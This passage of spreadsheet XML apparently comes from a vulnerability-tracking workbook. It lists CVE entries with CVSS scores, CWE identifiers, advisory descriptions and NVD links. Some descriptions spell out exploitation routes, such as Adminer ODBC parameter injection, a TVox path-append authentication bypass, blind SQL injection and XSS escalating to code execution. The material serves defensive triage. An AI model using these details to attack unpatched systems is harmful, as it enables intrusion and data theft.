          <t>An issue in TokTok qTox v1.18.4 allows a local attacker to cause a denial of service via the src/persistence/serialize.cpp component</t>
        </is>
      </c>
      <c r="M428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51106</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52735</t>
        </is>
      </c>
      <c r="C429" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D429" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E429" s="5" t="inlineStr"/>
      <c r="F429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>CWE-684</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, Zebra can accept a block that zcashd rejects because the P2SH signature-operation counter undercounts redeem scripts containing a disabled opcode followed by signature opcodes. In zebra-script/src/lib.rs, p2sh_input_sigop_count used the pure-Rust script::Code::sig_op_count path, whose try_fold parser stops at disabled opcodes such as OP_CODESEPARATOR and returns only the partial count accumulated before the error. The zcashd reference implementation continues static signature-operation counting through disabled opcodes, so an attacker can broadcast P2SH spends that Zebra counts below MAX_BLOCK_SIGOPS while zcashd counts above the 20,000-operation limit. If a Zebra miner includes those transactions, Zebra validators accept the block while zcashd validators reject it, creating a consensus chain split that affects network integrity and availability without requiring the attacker to produce a block. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52735</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53578</t>
        </is>
      </c>
      <c r="C430" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D430" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E430" s="5" t="inlineStr"/>
      <c r="F430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G430" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the mindMap note type, whose JSON content is stored without sanitization, allowing an attacker-supplied import archive to embed a payload that renders as arbitrary HTML. A mind map node can carry a dangerouslySetInnerHTML property that the Mind Elixir library assigns directly to a node's innerHTML, so a malicious note survives Safe import and executes script as soon as the victim opens the imported mind map. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53578</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53579</t>
        </is>
      </c>
      <c r="C431" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D431" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E431" s="5" t="inlineStr"/>
      <c r="F431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G431" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the book note type, whose content is stored without sanitization and later rendered as HTML, allowing an attacker-supplied import archive to embed a payload that executes as script. A book note's content is routed through the same rendering path as text notes and injected into the page with jQuery's html method when the note is shown as a grid-view preview card, so a malicious note survives Safe import and runs as soon as the victim opens the containing note. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53579</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53670</t>
        </is>
      </c>
      <c r="C432" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D432" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E432" s="5" t="inlineStr"/>
      <c r="F432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, in the Prevail eBPF verifier, EbpfTransformer::add() silently skips offset-variable updates when the destination register carries a non-singleton typeset (two or more simultaneously possible pointer types). Subsequent bounds checks use the stale offset and accept out-of-bounds memory accesses, so a crafted BPF program passes verification even though it would corrupt memory at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="M432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53670</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53671</t>
        </is>
      </c>
      <c r="C433" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D433" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E433" s="5" t="inlineStr"/>
      <c r="F433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the abstract transformer in prevail treats writes through a T_CTX-typed base register as a silent no-op: do_mem_store in src/crab/ebpf_transformer.cpp only models T_STACK stores, and the checker's T_CTX bounds arm never tests AccessType::write. An attacker can craft an eBPF program that overwrites a context field (e.g., ctx-&gt;data), reload that field typed as T_PACKET, and dereference an attacker-controlled address — and prevail will report the program as safe. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="M433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53671</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55068</t>
        </is>
      </c>
      <c r="C434" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D434" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E434" s="5" t="inlineStr"/>
      <c r="F434" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G434" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In 4.2.2 and earlier, the NRF RegisterNFInstance handler at PUT /nnrf-nfm/v1/nf-instances/{nfInstanceID} accepts NF Profiles without enforcing UUID format, nfStatus enum values, heartBeatTimer ranges, mandatory profile fields, or nfServices.ipEndPoints address constraints. The invalid profiles are persisted in the MongoDB NfProfile collection and returned by NFDiscover, allowing an attacker with SBI access to advertise attacker-controlled network-function endpoints and redirect control-plane signaling. This can expose credentials and signaling, alter service discovery integrity, and deny service across network functions that trust the NRF. This issue is fixed in version 4.2.3.</t>
        </is>
      </c>
      <c r="M434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55068</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55220</t>
        </is>
      </c>
      <c r="C435" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D435" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E435" s="5" t="inlineStr"/>
      <c r="F435" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L435" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, Pimcore\Model\DataObject\ClassDefinition\Data\Hotspotimage::getDataFromResource() in models/DataObject/ClassDefinition/Data/Hotspotimage.php passes the field __hotspots object-store column to Pimcore\Tool\Serialize::unserialize() without an allowed-classes restriction after JSON decoding fails. An attacker with a separate capability to write crafted PHP serialized bytes into that column can instantiate available classes and trigger magic methods when an affected DataObject is loaded, which can produce arbitrary file writes or code execution through bundled gadget chains. The related ImageGallery, Block, and Video callers use the same fallback pattern, but the identified June fix changes the Hotspotimage caller only. This issue is fixed for Hotspotimage in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="M435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55220</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55378</t>
        </is>
      </c>
      <c r="C436" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D436" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E436" s="5" t="inlineStr"/>
      <c r="F436" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G436" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr">
        <is>
          <t>JS Recon is a JavaScript enumeration and SAST tool. From 1.2.1-beta.1 until 1.3.1-beta.2, the PR Branch Checker workflow in .github/workflows/pr_checker.yml places github.head_ref and github.event.pull_request.head.repo.full_name into BRANCH_NAME and SOURCE_REPO and interpolates those untrusted values into a shell gh pr comment command. A remote user who opens a pull request can use shell metacharacters in a branch or fork name to execute commands in the GitHub Actions runner with the workflow's GITHUB_TOKEN, which has pull-requests write permission. This issue is fixed in version 1.3.1-beta.2.</t>
        </is>
      </c>
      <c r="M436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55378</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56705</t>
        </is>
      </c>
      <c r="C437" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D437" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E437" s="5" t="inlineStr"/>
      <c r="F437" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L437" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 fails to sanitize the server field before constructing a PDO DSN string, allowing unauthenticated attackers to inject ODBC parameters via semicolons. Attackers can inject TraceFile and TraceOn parameters to write PHP code to the web root, achieving remote code execution when the trace file is accessed.</t>
        </is>
      </c>
      <c r="M437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56705</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57910</t>
        </is>
      </c>
      <c r="C438" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D438" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-347, CWE-494</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in the WatchGuard Agent allows an unauthenticated attacker with network access to cause the agent to execute arbitrary code with elevated privileges.</t>
        </is>
      </c>
      <c r="M438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57910</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61514</t>
        </is>
      </c>
      <c r="C439" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D439" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L439" s="5" t="inlineStr">
        <is>
          <t>Puwell IP Camera firmware versions 2.x through 4.x contains an authentication bypass vulnerability that allows unauthenticated attackers to access device functions by sending protocol-conforming packets over TCP port 23456 without credentials. Attackers can exploit the unvalidated Session field in the proprietary control protocol header to access live video streams, control pan and tilt motors, activate audio functions, and remotely restart the device.</t>
        </is>
      </c>
      <c r="M439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61514</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61515</t>
        </is>
      </c>
      <c r="C440" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D440" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="L440" s="5" t="inlineStr">
        <is>
          <t>Puwell IP Camera firmware versions 2.x through 4.x contains an unauthenticated command injection vulnerability that allows remote attackers to execute arbitrary operating system commands by sending a crafted JSON payload to the DebugShell interface exposed on TCP port 34567. Attackers can exploit the lack of authentication and input sanitization in the binary protocol service to pass arbitrary commands directly to the underlying operating system, achieving root-level code execution and complete device compromise.</t>
        </is>
      </c>
      <c r="M440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61515</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61516</t>
        </is>
      </c>
      <c r="C441" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D441" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E441" s="5" t="inlineStr"/>
      <c r="F441" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L441" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an information disclosure vulnerability that allows unauthenticated attackers to retrieve the administrator password by sending a request to the sysinfo action in the web management interface without a valid session. Attackers can replay the exposed credential against the login handler to establish a fully authenticated administrator session on the device.</t>
        </is>
      </c>
      <c r="M441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62645</t>
        </is>
      </c>
      <c r="C442" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D442" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L442" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Information is exposed through the web interface that can be used to calculate the current and past session ID numbers. This could allow an attacker to bypass the authentication and gain unauthorized access to the device.</t>
        </is>
      </c>
      <c r="M442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62647</t>
        </is>
      </c>
      <c r="C443" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D443" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A random number generator is used to generate security-relevant values (such as session identifiers used for authentication purposes) that is not initialized with a True Random Number Generator (TRNG), resulting in a predictable sequence of generated values. This could allow an unauthenticated remote attacker to more easily predict the generated values and impersonate a legitimate authenticated user, potentially gaining unauthorized access to the device.</t>
        </is>
      </c>
      <c r="M443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62681</t>
        </is>
      </c>
      <c r="C444" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D444" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G444" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L444" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, an unescaped backtick in an OpenAPI path is emitted into request URL template literals generated for axios, fetch, react-query, and SWR clients without safe encoding. This permits attacker-controlled JavaScript to be evaluated when a generated request, URL-builder, or query-key function is called, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/route.ts and route generation consumers. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62681</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62682</t>
        </is>
      </c>
      <c r="C445" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D445" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G445" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L445" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, an unescaped backtick in servers[0].url is emitted into request URL template literals generated when output.baseUrl.getBaseUrlFromSpecification is enabled without safe encoding. This permits attacker-controlled JavaScript to be evaluated when a generated request or URL-builder function is called, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/route.ts function getFullRoute. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62682</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62928</t>
        </is>
      </c>
      <c r="C446" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D446" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L446" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains an OS Command Injection (CWE-78). Unauthenticated OS command may be injected.</t>
        </is>
      </c>
      <c r="M446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62928</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63106</t>
        </is>
      </c>
      <c r="C447" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D447" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G447" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L447" s="5" t="inlineStr">
        <is>
          <t>ReadyEcommerce before 4.5.2 contains an unauthenticated SQL injection vulnerability in the product listing API where the rating parameter from the products endpoint is concatenated directly into a MySQL HAVING clause without parameterization in ProductController.php. Attackers can perform time-based blind SQL injection through the unsanitized rating parameter to extract the full database contents, including user credentials and administrator password hashes, with potential additional file system access due to the database connection running as root.</t>
        </is>
      </c>
      <c r="M447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63106</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64827</t>
        </is>
      </c>
      <c r="C448" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D448" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L448" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain an authentication bypass vulnerability in set_env.php where the redirectToLoginAdminIRequestHaveAccessToken() function derives the current page name from PHP_SELF and skips authentication when the value matches 'login_admin.php'. Attackers can append '/login_admin.php' to the path of any target PHP script to cause the authentication check to pass and gain unauthenticated access to all PHP scripts under the manager HTML directory.</t>
        </is>
